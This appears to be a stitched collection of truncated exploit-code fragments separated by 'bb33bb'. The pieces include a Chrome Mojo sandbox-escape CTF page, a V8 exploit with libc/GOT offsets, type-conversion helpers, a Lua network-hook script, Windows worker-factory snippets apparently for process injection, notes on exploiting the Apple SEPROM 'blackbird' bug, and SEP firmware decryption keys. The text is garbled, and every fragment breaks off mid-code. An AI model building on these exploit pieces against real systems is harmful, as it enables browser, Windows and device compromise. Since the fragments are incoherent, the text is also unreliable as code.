bb33bb

<html>
  <head>
    <title>RedPwn sbx-1</title>
  </head>
  <body>
    <h1>:thonk:</h1>
    <pre id='log'></pre>
  </body>
  <script src='./mojo_bindings.js'></script>
  <script src='./third_party/blink/public/mojom/desert.mojom.js'></script>

bb33bb

function pwn() {

  /* Helpers */
  var k_jsObjectSize = 0x70
  var fclose_got = 0x45e58
  var __libc_atoi = 0x18ea90
  var __libc_environ = 0x1ef2e0
  var __free_got = 0x4dde0
  var __je_free = 0x13b10

bb33bb

<html>
 <head>
  <script>
   ( async() => {

     let gc = function() {
      for(let i = 0; i < 100; i++) {
       new ArrayBuffer(0x10000000);
      }
     }

bb33bb

//"use script";

const color_red = "";
const color_green = "";
const color_yellow = "";
const color_blue = "";
const color_mag = "";
const color_cyan = "";
const color_default = "";

bb33bb

class Helpers {

 constructor() {
  this.cvt_buf = new ArrayBuffer(8);
  this.cvt_f64a = new Float64Array(this.cvt_buf);
  this.cvt_u64a = new BigUint64Array(this.cvt_buf);
  this.cvt_u32a = new Uint32Array(this.cvt_buf);
 }

 ftoi(f) {

bb33bb

-- Simple network hook script
addressOfSend = getAddress("WS2_32.send")
addressOfGetStatus1 = getAddress("Kernel32.GetQueuedCompletionStatus")
addressOfGetStatus2 = getAddress("Kernel32.GetQueuedCompletionStatusEx")
addressOfCreateIoCompletionPort = getAddress("Kernel32.CreateIoCompletionPort")
print(string.format("WS2_32.send = %x, Kernel32.GetQueuedCompletionStatus = %x, Kernel32.GetQueuedCompletionStatusEx = %x, Kernel32.CreateIoCompletionPort = %x", addressOfSend, addressOfGetStatus1, addressOfGetStatus2, addressOfCreateIoCompletionPort))

debug_removeBreakpoint(addressOfSend)
debug_removeBreakpoint(addressOfGetStatus1)
debug_removeBreakpoint(addressOfGetStatus2)

bb33bb

#include <Windows.h>
#include <stdio.h>


#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

typedef struct _UNICODE_STRING {

bb33bb

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
	WorkerFactoryTimeout, // LARGE_INTEGER

bb33bb

On Aug 6 2020 @windknown posted about SEPROM bug called "blackbird" with attached presentation: https://twitter.com/windknown/status/1291308058493116416?s=20

@littlailo also posted that he had the bug, and their own gist/explanation: https://twitter.com/littlelailo/status/1296774861344432131?s=20

Short recap of the bug: The function where SEPROM prepares it's external TZ0 memory reads the TZ0/TZ1 base/end regs it shifts them out of bounds (<< 12) making any bit above 20 invisible to SEPROM, whereas AMCC (Apple’s Memory Cache Controller) casts the 32-bit register into 64-bit therefore which can result in arbitrary TZ0 r/w from AP side.

NOTE: there will be no much explanation of how some things work there, just pure exploitation from my perspective. To learn more about SEPROM/bug itself you should read windknown's presentation first.

How to get the bug working:
1. read the TZ0/TZ1 base/end reg values from iBoot (platform_bootprep)

bb33bb

iPad6,3
iOS 9.3 (13E234)
sep-firmware.j127.RELEASE.im4p
IV: 0F91420AA134E6D8D6807EFA7FFAB446
KEY: 42F908A3012E9E2DC22EDD818621C4BECFB41AED43D78671AB28BB8126268DB4


iPad6,8 
iPadOS 13.2 (17B84)
sep-firmware.j99a.RELEASE.im4p